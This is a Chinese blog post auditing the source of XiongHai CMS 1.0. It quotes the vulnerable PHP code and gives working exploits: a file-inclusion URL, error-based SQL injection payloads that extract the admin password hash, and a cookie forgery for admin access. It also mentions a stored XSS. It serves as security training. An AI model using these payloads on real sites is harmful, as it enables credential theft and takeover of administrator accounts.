熊海是一款小型的内容管理系统,1.0版本是多年前的版本了,所以漏洞还是比较多的,而且审计起来难度不大,非常适合入门,所以今天我进行这款cms的代码审计。程序安装后使用seay源代码审计系统打开,首先使用自动审计。

  可以看到,seay源代码审计工具还是审出了非常多的可疑漏洞的,但是这款工具还是有一定的误报率的。我们需要做的就是可疑漏洞的检查。

0x01 /index.php 的文件包含

  我们首先检查第一个可疑漏洞,打开/index.php文件:

 <?php

 //单一入口模式

 error_reporting(0); //关闭错误显示

 $file=addslashes($_GET['r']); //接收文件名

 $action=$file==''?'index':$file; //判断为空或者等于index

 include('files/'.$action.'.php'); //载入相应文件

 ?>

  在第6行,我们可以发现这里存在一个非常明显的文件包含漏洞,参数r没有经过任何过滤直接被include包含。我们在根目录下创建phpinfo.php文件,内容为<?php phpinfo(); ?>,在url里提交?r=../phpinfo,程序添加.php后缀名后产生了文件包含。

  /admin/index.php也同理存在文件包含漏洞。

 0x02 /admin/files/login.php SQL注入

  后面的这些漏洞暂时不看,对一个网站来说,后台登陆的安全性需求最高,我们直接来看登陆页面的代码:

 <?php

 ob_start();

 require '../inc/conn.php';

 $login=$_POST['login'];

 $user=$_POST['user'];

 $password=$_POST['password'];

 $checkbox=$_POST['checkbox'];

 if ($login<>""){

 $query = "SELECT * FROM manage WHERE user='$user'";

 $result = mysql_query($query) or die('SQL语句有误:'.mysql_error());

 $users = mysql_fetch_array($result);

 if (!mysql_num_rows($result)) {

 echo "<Script language=JavaScript>alert('抱歉,用户名或者密码错误。');history.back();</Script>";

 exit;

 }else{

 $passwords=$users['password'];

 if(md5($password)<>$passwords){

 echo "<Script language=JavaScript>alert('抱歉,用户名或者密码错误。');history.back();</Script>";

 exit;

     }

 //写入登录信息并记住30天

 if ($checkbox==1){

 setcookie('user',$user,time()+3600*24*30,'/');

 }else{

 setcookie('user',$user,0,'/');

 }

 echo "<script>this.location='?r=index'</script>";

 exit;

 }

 exit;

 ob_end_flush();

 }

 ?>

  一段赏心悦目的漏洞,如果所有的网站都这样就不会陷入日站日不动,审计没思路的尴尬局面了。简单看了一眼代码后,企图直接万能密码登陆,登陆的时候发现可以用错误的用户名和正确的密码登陆,如果密码不正确还是不能登陆。黑盒测试失败,继续回来看代码吧...

  首先程序用post方式接收我们传递的参数,然后未经任何过滤进行了用户名校验,如果用户名存在继续进行密码校验。问题出在代码的第19行,这里首先将我们传递的password变量进行md5散列,然后拿散列值与数据库里面的密码进行核对,这也就是我们不能采用万能密码绕过的原因。不过问题不大这里的sql注入算是石锤了,我们可以通过报错注入来利用这个漏洞。我们提交用户名为:

1' or updatexml(1,concat((select concat(0x7e,password,0x7e) from manage)),0) #

  成功报错,我们利用返回的md5值查找对应的密码,结果是找不到的,仔细查看原因发现返回的md5值只有27位...所以我们要进行两次报错注入拼接md5值,最终payload:

1' or updatexml(1,concat((select concat(0x7e,password) from manage)),0) #

1' or updatexml(1,concat((select concat(password,0x7e) from manage)),0) #

 0x03 后台的SQL注入

  成功登陆后台之后我们再查看后台的可疑漏洞,根据自动分析的结果,我们看到了一大堆SQL注入漏洞。一个一个点开看,非常多的变量使用了addslashes进行过滤,这里也不存在gbk和utf-8的编码问题,所以也不用考虑宽字节注入,基本确定属于误报。后面第一个真正的漏洞位于/admin/files/editlink.php,源码如下:

 <?php

 require '../inc/checklogin.php';

 require '../inc/conn.php';

 $linklistopen='class="open"';

 $id=$_GET['id'];

 $query = "SELECT * FROM link WHERE id='$id'";

 $resul = mysql_query($query) or die('SQL语句有误:'.mysql_error());

 $link = mysql_fetch_array($resul);

 $save=$_POST['save'];

 $name=$_POST['name'];

 $url=$_POST['url'];

 $mail=$_POST['mail'];

 $jieshao=$_POST['jieshao'];

 $xs=$_POST['xs'];

 if ($xs==""){

 $xs=1;

     }

 if ($save==1){

 if ($name==""){

 echo "<script>alert('抱歉,链接名称不能为空。');history.back()</script>";

 exit;

 }

 if ($url==""){

 echo "<script>alert('抱歉,链接地址不能为空。');history.back()</script>";

 exit;

 }

 $query = "UPDATE link SET

 name='$name',

 url='$url',

 mail='$mail',

 jieshao='$jieshao',

 xs='$xs',

 date=now()

 WHERE id='$id'";

 @mysql_query($query) or die('修改错误:'.mysql_error());

 echo "<script>alert('亲爱的,链接已经成功编辑。');location.href='?r=linklist'</script>";

 exit;

 }

 ?>

  非常明显还是那个老问题,通过post提交变量,中间没有进行任何过滤直接查询数据库,继续用刚刚的payload吧,漏洞确实存在的,而且后面还有好多处,不挨个写了。

' or updatexml(1,concat((select concat(0x7e,password,0x7e) from manage)),0) or '

0x04 留言板XSS

  源码审计系统还报了一处位于/seacmseditor/php/controller.php的XSS漏洞,但是这里在输出到浏览器的时候被htmlspecialchars转义成为了html实体,所以说这又是一个误报。但是这套CMS还有一个影响比较严重的XSS没有被扫描出,CMS的前台留言板没有进行XSS过滤,后台管理界面也没有进行过滤,因此产生了存储型XSS,而且有针对性的攻击管理员,属于比较危险的一类XSS了。这里不贴代码了。

0x05 垂直越权

  自动审计结果还给出了好几个/inc目录下的任意文件读取,挨个打开阅读源码之后并没有发现这个漏洞,倒是checklogin.php存在一个垂直越权漏洞:

 <?php

 $user=$_COOKIE['user'];

 if ($user==""){

 header("Location: ?r=login");

 exit;

 }

 ?>

  一个判断管理员的程序,如果COOKIE中user参数为空,那么就跳转到登陆窗。这样的话越权就很轻松了,我们访问一个需要管理员权限的页面,例如http://127.0.0.1/xhcms-1.0/admin/?r=editlink,抓包在COOKIE后面添加user=admin即可实现越权。

  总之这款CMS对新手友好,大家也可以试着玩一下!

最新文章

  1. HttpClient在HTTP协议接口测试中的使用
  2. 【XLL 框架库函数】 QuitFramework
  3. CentOS7 mono环境连接WCF
  4. odoo报表条码无法显示解决[转]
  5. System.gc()与Object.finalize()的区别
  6. C语言中的const
  7. C#中Socket编程解决应用程序直接的通信
  8. 2013 ACM区域赛长沙 A Alice’s Print Service HDU 4791
  9. html系列教程--article audio
  10. 【linux之链接,函数,随机数】
  11. 「洛谷5300」「GXOI/GZOI2019」与或和【单调栈+二进制转化】
  12. 如何使用Linux的Crontab定时执行PHP脚本的方法[转载]
  13. QML-WebEngineView加载html(Echarts绘图)
  14. ES集群
  15. hihoCoder.1509.异或排序(位运算 思路)
  16. windows命令行下杀死进程的方法
  17. 《RECURRENT BATCH NORMALIZATION》
  18. Django import相关
  19. ImportError: cannot import name &#39;main&#39;的解决办法
  20. 大数据入门第六天——HDFS详解

热门文章

  1. 从AppleWatch4发布后对手股价大跌看可穿戴市场未来
  2. 从 relu 的多种实现来看 torch.nn 与 torch.nn.functional 的区别与联系
  3. 三分钟入坑指北 &#128284; Docsify + Serverless Framework 快速创建个人博客系统
  4. pywin32获得tkinter窗口句柄,并在上面绘图
  5. SWIG 3 中文手册——9. SWIG 库
  6. UVA 125 统计路径条数 FLOYD
  7. IE浏览器F12调试模式不能使用或报错以及安装程序遇到错误0x80240037的解决办法
  8. Java之线程通信的方法
  9. 给select赋值之后,再点击选择下拉值时,显示一值不变的解决
  10. CodeForces 992B Nastya Studies Informatics + Hankson的趣味题(gcd、lcm)